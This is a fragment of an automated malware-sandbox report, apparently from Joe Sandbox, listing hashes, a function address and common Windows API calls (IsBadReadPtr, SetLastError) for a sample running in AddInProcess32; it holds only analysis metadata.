                                                                                  • Instruction ID: 0ecaebee41cb6558e50c6262f5020644a21471e748dd5a13caac6b8f2b864e38
                                                                                  • Opcode Fuzzy Hash: 570887f611a5d1f74d34073c32c2f77717d7cd84bcf1f9b239cc9e46d00ed125
                                                                                  • Instruction Fuzzy Hash: AD411630600205BFDB229F65D844B6B7BB4EF09328F14516EFA59AB3A1DB38CD01C799
                                                                                  Function 004105C4 Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 004105F1
                                                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 004106BD
                                                                                  • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004106DF
                                                                                  • SetLastError.KERNEL32(0000007E,00410955), ref: 004106F6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLastRead
                                                                                  • String ID:
                                                                                  • API String ID: 4100373531-0
                                                                                  • Opcode ID: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
                                                                                  • Instruction ID: 0e21605053d2ba8273329305491efaf700724209343246308e891da9604144dc
                                                                                  • Opcode Fuzzy Hash: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
                                                                                  • Instruction Fuzzy Hash: 73417C71644305DFE7208F18DC84BA7B7E4FF88714F00442EE54687691EBB5E8A5CB19